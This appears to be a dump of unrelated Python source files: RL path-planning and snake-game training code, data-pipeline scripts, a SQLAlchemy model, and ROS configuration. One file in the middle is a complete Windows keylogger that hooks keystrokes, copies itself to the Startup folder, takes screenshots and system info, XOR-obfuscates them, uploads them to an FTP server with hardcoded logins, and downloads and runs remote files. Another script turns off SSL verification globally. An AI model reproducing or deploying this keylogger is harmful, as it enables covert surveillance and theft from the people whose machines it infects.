run_process(["qrencode", data, "-o", fn_path], shell=False)
logger.info("QR code generated at: %s" % fn_path) |
import argparse
import os
from src.h_CPP.Environment import H_CPPEnvironmentParams, H_CPPEnvironment
from src.CPP.Environment import CPPEnvironment, CPPEnvironmentParams
from src.DH.Environment import DHEnvironmentParams, DHEnvironment
from src.DHMulti.Environment import DHMultiEnvironment
from utils import *
def main_cpp(p):
env = CPPEnvironment(p)
env.run()
def main_dh(p):
env = DHEnvironment(p)
env.run()
def main_h(p):
env = H_CPPEnvironment(p)
env.run()
def main_dh_multi(p):
env = DHMultiEnvironment(p)
env.run()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', action='store_true', help='Activates usage of GPU')
parser.add_argument('--generate_config', action='store_true', help='Enable to write default config only')
parser.add_argument('--config', default=None, help='Path to config file')
parser.add_argument('--id', default=None, help='If set overrides the logfile name and the save name')
parser.add_argument('--params', nargs='*', default=None)
parser.add_argument('--h_cpp', action='store_true', help='Run Coverage Path Planning with hierarchical Agent')
parser.add_argument('--cpp', action='store_true', help='Run Coverage Path Planning')
parser.add_argument('--dh', action='store_true', help='Run Path Planning for Data Harvesting')
parser.add_argument('--multi', action='store_true', help='Run Path Planning for Multi (So far only DH)')
args = parser.parse_args()
if args.generate_config:
if args.h_cpp:
generate_config(H_CPPEnvironmentParams(), "config/old_configs/h_cpp.json")
elif args.dh:
generate_config(DHEnvironmentParams(), "config/old_configs/dh.json")
elif args.cpp:
generate_config(CPPEnvironmentParams(), "config/old_configs/cpp.json")
else:
print("Specify which config to generate, DH or CPP")
exit(0)
if args.config is None:
print("Config file needed!")
exit(1)
if not args.gpu:
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
params = read_config(args.config)
if args.params is not None:
params = override_params(params, args.params)
if args.id is not None:
params.model_stats_params.save_model = "models/" + args.id
params.model_stats_params.log_file_name = args.id
save_json_to_logs(params, params.model_stats_params.save_model + f'{params.model_stats_params.log_file_name}/')
save_json_to_logs(params, 'logs/plots/' + str(params.model_stats_params.log_file_name) + '/')
# if args.cpp:
# main_cpp(params)
# elif args.h_cpp:
# main_h(params)
# elif args.dh:
# if args.multi:
# main_dh_multi(params)
# else:
# main_dh(params)
main_h(params) |
class BarryFileException(Exception):
"""Raise exception when dealing with input files."""
class BarryConversionException(Exception):
"""Raise exception when converting file to dataframe."""
class BarryExportException(Exception):
"""Raise exception when writing dataframe to a file."""
class BarryDFException(Exception):
"""Raise exception while performing transformation to a dataframe."""
|
# Funktion zum Konvertieren eines JSON-Strings in ein
# Python-Array. Die Funktion erhält den JSON-String in der
# Übergabe und liefert das Ergebnis-Array zurück.
def toStringArray(jsonArray):
stringArray = []
# Alle Leerzeichen entfernen
jsonArray = jsonArray.replace(" ", "")
# Sind wir gerade mitten in einem JSON-String?
stringOpen = False
word = ""
# Gehe jedes Zeichen durch
for c in jsonArray:
# Sind wir jetzt bei einem Anführungsstrich
if c == "'":
# Waren wir in einem String, sind wir jetzt am Ende
if stringOpen:
# Füge hinzu
stringArray.append(word)
# Word resetten
word = ""
stringOpen = False
else:
# Jetzt sind wir im JSON-String
stringOpen = True
# Ansonsten Zeichen hinzufügen, solange wir
# im JSON-String sind
elif stringOpen:
word += c
return stringArray
# Startpunkt des Hauptprogramms
# Hier wird die implementierte Stringverarbeitungsfunktion zu
# Demonstrations- und Testzwecken aufgerufen.
jsonArray = "[ 'Null', 'Eins', 'Zwei', 'Drei', 'Vier' ]"
stringArray = toStringArray(jsonArray)
for element in stringArray:
print element
|
from .MidiInfo import * |
from __future__ import annotations
from datetime import datetime
from typing import TYPE_CHECKING
from sqlalchemy import Boolean, Column, DateTime, Integer, String, Text
from grouper.constants import MAX_NAME_LENGTH
from grouper.models.base.model_base import Model
if TYPE_CHECKING:
from grouper.models.base.session import Session
class Permission(Model):
"""Represents permission types.
See PermissionEdge for the mapping of which permissions exist on a given Group.
"""
__tablename__ = "permissions"
id = Column(Integer, primary_key=True)
name = Column(String(length=MAX_NAME_LENGTH), unique=True, nullable=False)
description = Column(Text, nullable=False)
created_on = Column(DateTime, default=datetime.utcnow, nullable=False)
audited = Column(Boolean, default=False, nullable=False)
enabled = Column(Boolean, default=True, nullable=False)
@staticmethod
def get(session: Session, name: str) -> Permission:
return session.query(Permission).filter_by(name=name).scalar()
|
from setuptools import setup, find_packages
setup(
name="tg_logger",
version="3.1",
description="A tool to bridge python logging and user files to telegram bot",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
author="ChernV (otter18)",
author_email="vchern185@gmail.com",
url="https://github.com/otter18/tg_logger",
packages=find_packages(),
install_requires=[
"pyTelegramBotAPI==3.7.6",
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
|
import argparse
from update_js import update_js
from generate_display_tables import generate_display_tables
from datetime import date, timedelta
import subprocess
def read_lexicon(lfile):
conversion = {}
with open(lfile) as inf:
for entry in inf:
spent = entry.strip().split(",")
for alternative in spent:
conversion[alternative] = spent[0]
# automatically create an all uppercase lexicon alternative
if alternative != alternative.upper():
conversion[alternative.upper()] = spent[0]
return conversion
def parse_setup():
parser = argparse.ArgumentParser()
parser.add_argument("-i","--input",help="Path to the protobuf file to update the website to display.")
parser.add_argument("-s","--sample_regions",help="Path to a two-column tsv containing sample names and associated regions.")
parser.add_argument("-j","--geojson",help="Path to a geojson to use.")
parser.add_argument("-m","--metadata",help="Path to a metadata file matching the targeted protobuf to update the website to display.")
parser.add_argument("-f","--reference",help="Path to a reference fasta.")
parser.add_argument("-a","--annotation",help="Path to a gtf annotation matching the reference.")
parser.add_argument("-t","--threads",type=int,help="Number of threads to use.", default = 4)
parser.add_argument("-l","--lexicon",help="Optionally, link to a text file containing all names for the same region, one region per row, tab separated.", default = "")
parser.add_argument("-X","--lookahead",type=int,help="Number to pass to parameter -X of introduce. Increase to merge nested clusters. Default 2", default = 2)
parser.add_argument("-H","--host",help="Web-accessible link to the current directory for taxodium cluster view.",default="https://raw.githubusercontent.com/jmcbroome/introduction-website/main/")
args = parser.parse_args()
return args
def primary_pipeline(args):
pbf = args.input
mf = args.metadata
if args.lexicon != "":
conversion = read_lexicon(args.lexicon)
else:
conversion = {}
# print(conversion)
print("Calling introduce.")
subprocess.check_call("matUtils introduce -i " + args.input + " -s " + args.sample_regions + " -u hardcoded_clusters.tsv -T " + str(args.threads) + " -X " + str(args.lookahead), shell=True)
print("Updating map display data.")
update_js(args.geojson, conversion)
print("Generating top cluster tables.")
generate_display_tables(conversion, host = args.host)
print("Preparing taxodium view.")
sd = {}
# with open("cluster_labels.tsv") as inf:
# for entry in inf:
# spent = entry.strip().split()
# if spent[0] == "sample":
# continue
# sd[spent[0]] = spent[1]
with open("hardcoded_clusters.tsv") as inf:
for entry in inf:
spent = entry.strip().split()
if spent[0] == 'cluster_id':
continue
for s in spent[-1].split(","):
sd[s] = spent[9] + "_" + spent[0]
rd = {}
with open(args.sample_regions) as inf:
for entry in inf:
spent = entry.strip().split()
rd[spent[0]] = spent[1]
with open(mf) as inf:
with open("clusterswapped.tsv","w+") as outf:
#clusterswapped is the same as the metadata input
#except with the country column updated.
i = 0
for entry in inf:
spent = entry.strip().split("\t")
if i == 0:
spent.append("cluster")
spent.append("region")
i += 1
print("\t".join(spent),file=outf)
continue
if spent[0] in sd:
spent.append(sd[spent[0]])
else:
spent.append("N/A")
if spent[0] in rd:
spent.append(rd[spent[0]])
else:
spent.append("None")
i += 1
print("\t".join(spent),file=outf)
print("Generating viewable pb.")
subprocess.check_call("matUtils extract -i " + args.input + " -M clusterswapped.tsv -F cluster,region --write-taxodium cview.pb --title Cluster-Tracker -g " + args.annotation + " -f " + args.reference,shell=True)
print("Process completed; check website for results.")
if __name__ == "__main__":
primary_pipeline(parse_setup())
|
#
# Generated with StrouhalUserDefinedPropertyBlueprint
from dmt.blueprint import Blueprint
from dmt.dimension import Dimension
from dmt.attribute import Attribute
from dmt.enum_attribute import EnumAttribute
from dmt.blueprint_attribute import BlueprintAttribute
from .strouhalspecificationproperty import StrouhalSpecificationPropertyBlueprint
class StrouhalUserDefinedPropertyBlueprint(StrouhalSpecificationPropertyBlueprint):
""""""
def __init__(self, name="StrouhalUserDefinedProperty", package_path="sima/riflex", description=""):
super().__init__(name,package_path,description)
self.attributes.append(Attribute("name","string","",default=""))
self.attributes.append(Attribute("description","string","",default=""))
self.attributes.append(Attribute("_id","string","",default=""))
self.attributes.append(BlueprintAttribute("scriptableValues","sima/sima/ScriptableValue","",True,Dimension("*")))
self.attributes.append(BlueprintAttribute("reynoldStrouhalProperties","sima/riflex/ReynoldStrouhalNumberItem","",True,Dimension("*"))) |
'''
Python 2.7 implementation with some additional functionality:
-systeminfo data is uploaded when the file is executed
-all the data uploaded to FTP server is encrypted (keys_retriever.py is used to collect/decrypt the data)
-ability to take screenshot with simple kl.UploadScreenShot()
-auto-downloader so you can use keys_retriever.py to upload some file and it will be executed on the target, keys_retrieve.py allows to set few parameters to it like (persistence/execute/upload results if it's nirsoft application)
-use several ftp accounts in case if 1 is not available (drivehq.com has 25 logins/day limit so that's why there's such function)
-"keep alive" (NOOP) packet is sent each minute to the FTP
'''
import pyHook
import pythoncom
import sys, os
import ftplib, datetime
import threading, time
from Queue import Queue
import io, subprocess
from urllib2 import urlopen
import socket
import win32api
from ctypes import Structure, windll, c_uint, sizeof, byref #needed for GetIdleTime()
from random import randint
from PIL import ImageGrab, Image
import StringIO
class LASTINPUTINFO(Structure): #needed for GetIdleTime()
_fields_ = [
('cbSize', c_uint),
('dwTime', c_uint),
]
xorMap = [235, 235, 126, 240, 203, 237, 81, 160, 9, 37, 204, 43, 190, 31, 76, 98, 53, 200, 222, 172, 184, 172, 157, 214, 128, 194, 175, 119, 254, 25, 25, 193, 109, 190, 240, 162, 184, 184, 114, 117, 57, 63, 167, 61, 104, 86, 146, 85, 114, 205, 0, 73, 162, 188, 129, 22, 67, 26, 80, 50, 190, 7, 91, 15, 56, 127, 226, 61, 172, 204, 76, 72, 40, 154, 65, 85, 8, 223, 211, 178, 149, 106, 57, 204, 236, 147, 54, 246, 59, 90, 43, 148, 9, 50, 253, 74, 143, 201, 48, 252, 236, 236, 139, 30, 124, 44, 21, 245, 179, 53, 85, 243, 230, 21, 49, 7, 239, 153, 46, 9, 1, 119, 105, 25, 71, 139, 75, 58, 43, 229, 88, 234, 226, 201, 1, 69, 16, 71, 97, 32, 195, 197, 215, 37, 219, 81, 243, 202, 181, 177, 193, 98, 179, 92, 180, 72, 219, 176, 115, 173, 16, 212, 118, 24, 204, 18, 123, 155, 197, 254, 226, 208, 80, 120, 46, 222, 152, 213, 68, 33, 153, 62, 192, 162, 16, 225, 110, 81, 65, 156, 212, 31, 26, 178, 195, 23, 141, 241, 48, 180]
def ExceptionHandler(func): #the exe won't popup "Couldn't execute keys script" but will output encrypted exception to e.mm file and "gracefully" exit
def call(*args, **kwargs):
try: return func(*args, **kwargs)
except Exception as e:
#with open("e.mm", "wb") as f:
#f.write(XorText("Exception:\n"+str(e), xorMap)) #it's not a good idea to save it to a file if it's in the startup folder...
print "Handled exception:\n"+str(e)
raise SystemExit
return call
@ExceptionHandler
def GetIdleTime():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
windll.user32.GetLastInputInfo(byref(lastInputInfo))
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
@ExceptionHandler
def ProcessCmd(command):
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
r = proc.stdout.read() + proc.stderr.read()
return r[:len(r)-2]
@ExceptionHandler
def XorText(text, xorMap):
xoredText = ""
for i, letter in enumerate(text):
xoredText += chr(ord(text[i]) ^ (xorMap[i%len(xorMap)] ^ (xorMap[(len(text)- 1)%len(xorMap)]))) #chr(ord(letter) ^ xorMap[i%len(xorMap)])
return xoredText
@ExceptionHandler
def FilterKey(k, text):
if len(text) > len(k) and len(text) > 3:
if text[len(text)-len(k):] == k and (len(k) > 1 or any(specialKey == k and specialKey == text[len(text)-1] and specialKey == text[len(text)-2] for specialKey in ["w", "s", "a", "d"])):
return ""
return k
@ExceptionHandler
def GetPublicIP():
return str(urlopen('http://ip.42.pl/raw').read())
@ExceptionHandler
def GetLocalIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 0))
IP = s.getsockname()[0]
except: IP = '127.0.0.1'
finally: s.close()
return str(IP)
class Keylogger:
@ExceptionHandler
def __init__(self, **kwargs):
self.debug = kwargs.get("debug", False)
self.postfreq = kwargs.get("postfreq", 20)
self.q = Queue()
self.xorMap = xorMap
self.windowname = ""
self.strbuff = ""
self.secSendFile = time.clock()
self.secKeepConAlive = time.clock()
self.secCheckScreenCaptureRequest = time.clock()
self.secDownloadFile = time.clock()
self.ftpFolderName = "_" + "".join(letter for letter in ProcessCmd("echo %USERNAME%") if letter.isalnum())
@ExceptionHandler
def __del__(self):
try: self.ftp.quit()
except:
try: self.ftp.close()
except: pass
try: self.hookManager.UnhookKeyboard()
except: pass
@ExceptionHandler
def StartKeyCapture(self):
self.hookManager = pyHook.HookManager()
self.hookManager.KeyDown = self.OnKeypressCallback
self.hookManager.HookKeyboard()
pythoncom.PumpMessages()
@ExceptionHandler
def OnKeypressCallback(self, press):
if press.Ascii not in range(32,126):
self.q.put([FilterKey("<"+press.Key+">", self.strbuff), press.WindowName])
else:
self.q.put([FilterKey(chr(press.Ascii), self.strbuff), press.WindowName])
return True
@ExceptionHandler
def CopyItselfToStartup(self):
desired_file = ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/" + os.path.basename(sys.argv[0])
if not os.path.isfile(desired_file):
with open(os.path.basename(sys.argv[0]), "rb") as base_f, open(desired_file, "wb") as new_f:
new_f.write(base_f.read())
if self.debug: print "Copied itself to startup"
@ExceptionHandler
def FTP_Connect(self, server, port, name_list, pswd_list):
for name, pswd in zip(name_list, pswd_list):
try:
self.ftp = ftplib.FTP()
self.ftp.connect(server, port)
self.ftp.login(name, pswd)
except: continue
directories = []
self.ftp.retrlines('LIST', directories.append)
if not any(self.ftpFolderName in d for d in directories):
self.ftp.mkd(self.ftpFolderName)
if self.debug: print "Connected to the ftp server (" + ", ".join([server, name, pswd]) + ")"
return True
raise ValueError("Couldn't connect to: " + server + " using the following credentials:\n" + "".join(u + " : " + p + "\n" for u,p in zip(name_list, pswd_list)))
@ExceptionHandler
def UploadSystemInfo(self):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("_" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\_")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName +"\\_\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(XorText(GetPublicIP() +"\n"+ GetLocalIP() + "\n" + ProcessCmd("systeminfo"), xorMap)))
if self.debug: print "Systeminfo uploaded"
@ExceptionHandler
def UploadScreenShot(self, **kwargs):
screenFolder = "vv" if kwargs.get("vidstream") == True else "ii"
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any(screenFolder in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName + "\\" + screenFolder)
ss_pil = ImageGrab.grab()
imgBuff = StringIO.StringIO()
ss_pil.save(imgBuff, "JPEG")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName + "\\" + screenFolder + "\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(XorText(imgBuff.getvalue(), xorMap)))
imgBuff.close()
if self.debug: print "ScreenShot uploaded (\\" + screenFolder +")"
@ExceptionHandler
def IsScreenCaptureStreamRequested(self, **kwargs): #not developed it much, it requires more work to be done to be fully functional
if kwargs.get("dircheck", False) == True:
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("vv" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\vv")
return False
if any(f.startswith("s") for f in self.ftp.nlst("\\"+self.ftpFolderName+"\\vv")):
return True
return False
@ExceptionHandler
def IsFileDownloadAvailable(self):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("f" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\f")
if "f.mm" in self.ftp.nlst("\\"+self.ftpFolderName+"\\f"):
return True
return False
@ExceptionHandler
def DownloadFile(self):
if self.debug: print "DownloadFile"
dataChunks = []
if self.debug: print "0"
self.ftp.retrbinary('RETR ' + "\\"+ self.ftpFolderName +"\\f\\f.mm", dataChunks.append)
if self.debug: print 1
fileInfo, fileData = XorText("".join(dataChunks), self.xorMap).split("###########################_____________________###############################")
if self.debug: print 2
destinationFileName = [v.split("=")[1] for v in fileInfo.split("\n") if "destinationFileName" in v][0]
destinationPath = [v.split("=")[1] for v in fileInfo.split("\n") if "destinationPath" in v][0]
destinationPath = (ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/") if destinationPath == "startup" else (ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/" + destinationPath)
execute = True if [v.split("=")[1] for v in fileInfo.split("\n") if "execute" in v][0] == "True" else False
params = [v.split("=")[1] for v in fileInfo.split("\n") if "params" in v][0]
isNirsoft = True if [v.split("=")[1] for v in fileInfo.split("\n") if "nirsoft" in v][0] == "True" else False
desiredFile = destinationPath + destinationFileName
if not os.path.exists(destinationPath):
os.makedirs(destinationPath)
if os.path.isfile(desiredFile):
os.remove(desiredFile)
with open(desiredFile, "wb") as f:
f.write(fileData)
if self.debug: print "Downloaded "+ destinationFileName
if execute:
ProcessCmd("start \"\" \""+ desiredFile + "\"" + (" "+params if params != "none" else ""))
if self.debug: print "Executed "+ destinationFileName
if isNirsoft:
nsOutput = destinationFileName.split(".")[0] + ".mm"
for i in range(100):
time.sleep(0.1)
if os.path.isfile(nsOutput):
break
else:
if self.debug: print "Nirsoft output not available"
os.remove(desiredFile)
return
with open(nsOutput, "rb") as f:
data = XorText(f.read(),self.xorMap)
os.remove(nsOutput)
os.remove(desiredFile)
if self.debug: print "Nirsoft application and output files removed"
self.UploadNirsoftData(data, nsOutput)
self.ftp.delete("\\"+ self.ftpFolderName +"\\f\\f.mm")
if self.debug: print "Deleted "+ destinationFileName + " from ftp server"
@ExceptionHandler
def UploadNirsoftData(self, data, fileName):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("n" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\n")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName +"\\n\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(data))
if self.debug: print "Nirsoft data uploaded"
@ExceptionHandler
def Update(self):
try:data = self.q.get(block=False)
except:data = ["",self.windowname]
if data[1] != self.windowname:
self.windowname = data[1]
self.strbuff += "\n\n["+self.windowname+"]\n"
#print "secSendFile=" + str(self.secSendFile) + ", time.clock()=" + str(time.clock())
#print data[0]
self.strbuff += data[0]
if (time.clock() - self.secKeepConAlive) > 60: #every 1 min
self.secKeepConAlive = time.clock()
if self.debug: print "Keep connection alive is going to be sent."
self.ftp.voidcmd("NOOP")
if self.debug: print "Keep connection alive has been sent."
if (time.clock() - self.secSendFile) > self.postfreq*60 and self.strbuff:
self.secSendFile = time.clock()
if self.debug: print "To be uploaded: " + self.strbuff + "\n"
if self.debug: print "To be uploaded (xored): " + XorText(self.strbuff, self.xorMap) + "\n\n"
b = io.BytesIO(XorText(self.strbuff, self.xorMap))
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName +"\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", b)
self.strbuff = ""
#if (time.clock() - self.secCheckScreenCaptureRequest) > 15: #every 15 sec
#if self.IsScreenCaptureStreamRequested(dircheck = True):
#self.UploadScreenShot(vidstream=True)
if (time.clock() - self.secDownloadFile) > 15: #every 15 sec
if self.IsFileDownloadAvailable():
time.sleep(15)
self.DownloadFile()
def QuickSetup(**kwargs):
kl = Keylogger(postfreq=kwargs.get("postfreq", 20), debug=kwargs.get("debug", False))
if kwargs.get("persistence", False): kl.CopyItselfToStartup()
kl.FTP_Connect(kwargs.get("server", "ftp.drivehq.com"),
kwargs.get("port", 0),
kwargs.get("names",["michal", "monday", "thirdAccountUsername"]),
kwargs.get("passwords",["qwerty", "password2", "thirdAccountPssword"]))
kl.UploadSystemInfo()
kl.UploadScreenShot()
keyCapture = threading.Thread(target=kl.StartKeyCapture)
keyCapture.daemon = True
keyCapture.start()
while True:
kl.Update()#a.k.a. run()
time.sleep(0.02)
if __name__ == "__main__":
QuickSetup(postfreq=10, debug = True, persistence=False) |
from urllib import request
import ssl
# 全局去掉ssl验证
ssl._create_default_https_context = ssl._create_unverified_context
if __name__ == "__main__":
# get,默认请求方式
url = "www.ebiddingtest.cecep.cn/jyxx/001001/001001001/20200119/0cac7331-8385-48b7-b252-f836f329aa65.html"
res = request.urlopen(url)
print(res)
# 状态码
print(res.code)
# b bytes
print(res.read().decode("GBK"))
# 查看res有哪些方法
print(dir(res))
|
# -*- coding: utf-8 -*-
from optimus.i18n.manager import I18NManager
def po_interface(settings, init=False, update=False, compile_opt=False):
"""
Manage project translation catalogs for all registred languages.
You may enable all available modes. Modes are always processed in the same order:
"init" then "update" and finally "compile".
Arguments:
settings (optimus.conf.model.SettingsModel): Settings object which define paths
for locale directory and path for template sources to possibly scan.
Keyword Arguments:
init (boolean): Enable init mode to initialize POT file and "locale" directory.
update (boolean): Enable update mode to refresh POT file and PO files for
template changes.
compile_opt (boolean): Enable compile mode to compile MO files from PO files.
"""
# Proceed to operations
i18n = I18NManager(settings)
if init or update or compile_opt:
i18n.init_locales_dir()
i18n.build_pot(force=update)
i18n.init_catalogs()
if update:
i18n.update_catalogs()
if compile_opt:
i18n.compile_catalogs()
|
from handy import *
lines = read(20)
#lines = read_test(20)
alg = lines[0]
img = lines[2:]
img_h = len(img)
img_w = len(img[0])
def expand_img(char="."):
global img
global img_h, img_w
img = [char+x+char for x in img]
img_w += 2
img = [char*img_w]+img+[char*img_w]
img_h += 2
def pmap(img, r, c):
s = img[r-1][c-1:c+2]+img[r][c-1:c+2]+img[r+1][c-1:c+2]
return alg[int(s.replace('.','0').replace('#','1'), base=2)]
flip = True
print('\n'.join(img))
def enhance():
global img, img_h, img_w,flip
expand_img('.' if flip else '#')
expand_img('.' if flip else '#')
expand_img('.' if flip else '#')
flip = not flip
img_copy = [list(x) for x in img]
out = []
for r in range(1, img_h-1):
for c in range(1, img_w-1):
img_copy[r][c] = pmap(img, r, c)
# print("\n".join(["".join(z) for z in img_copy]))
img = ["".join(z[1:-1]) for z in img_copy[1:-1]]
img_w -= 2
img_h -= 2
print("\n".join(img))
|
# https://www.hackerrank.com/challenges/minimum-operations/problem
def min_operations(red, green, blue):
dp = [[(1<<30) for x in range(8)] for y in range(len(red)+1)]
n = len(red)
dp[0][0] = 0
for i in range(0, n):
for j in range(0, 8):
dp[i + 1][j | 1] = min(dp[i + 1][j | 1], dp[i][j] + green[i] + blue[i])
dp[i + 1][j | 2] = min(dp[i + 1][j | 2], dp[i][j] + red[i] + blue[i])
dp[i + 1][j | 4] = min(dp[i + 1][j | 4], dp[i][j] + red[i] + green[i])
j = 0
for i in range(0, n):
if red[i]:
j |= 1
if green[i]:
j |= 2
if blue[i]:
j |= 4
if dp[n][j] >= (1<<30):
dp[n][j] = -1
return dp[n][j]
n = int(input())
red = []
green = []
blue = []
for i in range(n):
r, g, b = map(int, input().split())
red.append(r)
green.append(g)
blue.append(b)
print(min_operations(red, green, blue)) |
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Accel.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/AccelStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/AccelWithCovariance.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/AccelWithCovarianceStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Inertia.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/InertiaStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Point.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Point32.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PointStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Polygon.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PolygonStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Pose2D.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Pose.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseArray.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseWithCovariance.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseWithCovarianceStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Quaternion.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/QuaternionStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Transform.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TransformStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Twist.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TwistStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TwistWithCovariance.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TwistWithCovarianceStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Vector3.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Vector3Stamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Wrench.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/WrenchStamped.msg"
services_str = ""
pkg_name = "geometry_msgs"
dependencies_str = "std_msgs"
langs = "gencpp;genlisp;genpy"
dep_include_paths_str = "geometry_msgs;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg;std_msgs;/usr/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python3"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/usr/lib/genmsg/genmsg_check_deps.py"
|
from game.models.base_game_model import BaseGameModel
from tf_models.ddqn_model import DDQNModel
from game.helpers.constants import Constants
from game.environment.action import Action
import random
import shutil
import numpy as np
import os
from statistics import mean
GAMMA = 0.99
MEMORY_SIZE = 10000
BATCH_SIZE = 32
REPLAY_START_SIZE = 50000
TRAINING_FREQUENCY = 4
TARGET_NETWORK_UPDATE_FREQUENCY = TRAINING_FREQUENCY*1000
MODEL_PERSISTENCE_UPDATE_FREQUENCY = 10000
SCORE_LOGGING_FREQUENCY = 100
LEARNING_LOGGING_FREQUENCY = 10000
EXPLORATION_MAX = 1.0
EXPLORATION_MIN = 0.1
EXPLORATION_TEST = 0.01
EXPLORATION_STEPS = 850000
EXPLORATION_DECAY = (EXPLORATION_MAX-EXPLORATION_MIN)/EXPLORATION_STEPS
class BaseDDQNGameModel(BaseGameModel):
model_dir_path = Constants.MODEL_DIRECTORY + "ddqn/"
model_input_shape = (int(Constants.FRAMES_TO_REMEMBER), int(Constants.ENV_WIDTH), int(Constants.ENV_HEIGHT))
def __init__(self, long_name, short_name, abbreviation):
BaseGameModel.__init__(self, long_name, short_name, abbreviation)
self.model_path = self.model_dir_path + Constants.DQN_MODEL_NAME
if os.path.exists(os.path.dirname(self.model_path)):
shutil.rmtree(os.path.dirname(self.model_path), ignore_errors=True)
os.makedirs(os.path.dirname(self.model_path))
self.action_space = len(Action.possible())
self.ddqn = DDQNModel(self.model_input_shape, self.action_space).model
self._load_model()
def move(self, environment):
BaseGameModel.move(self, environment)
def _save_model(self):
self.ddqn.save_weights(self.model_path)
def _load_model(self):
if os.path.isfile(self.model_path):
self.ddqn.load_weights(self.model_path)
class DDQNSolver(BaseDDQNGameModel):
def __init__(self):
BaseDDQNGameModel.__init__(self, "Double DQN", "double_dqn", "ddqn")
def move(self, environment):
BaseDDQNGameModel.move(self, environment)
if np.random.rand() < 0.01:
action_vector = random.randrange(self.action_space)
else:
state = environment.state()
q_values = self.ddqn.predict(np.expand_dims(np.asarray(state).astype(np.float64), axis=0), batch_size=1)
action_vector = Action.action_from_vector(np.argmax(q_values[0]))
return Action.normalized_action(environment.snake_action, action_vector)
class DDQNTrainer(BaseDDQNGameModel):
def __init__(self):
BaseDDQNGameModel.__init__(self, "Double DQN", "double_dqn_trainer", "ddqnt")
self.ddqn_target = DDQNModel(self.model_input_shape, self.action_space).model
self.memory = []
self.epsilon = EXPLORATION_MAX
def move(self, environment):
BaseDDQNGameModel.move(self, environment)
self._ddqn()
def _ddqn(self, total_step_limit=10000000, total_run_limit=None, clip=True):
run = 0
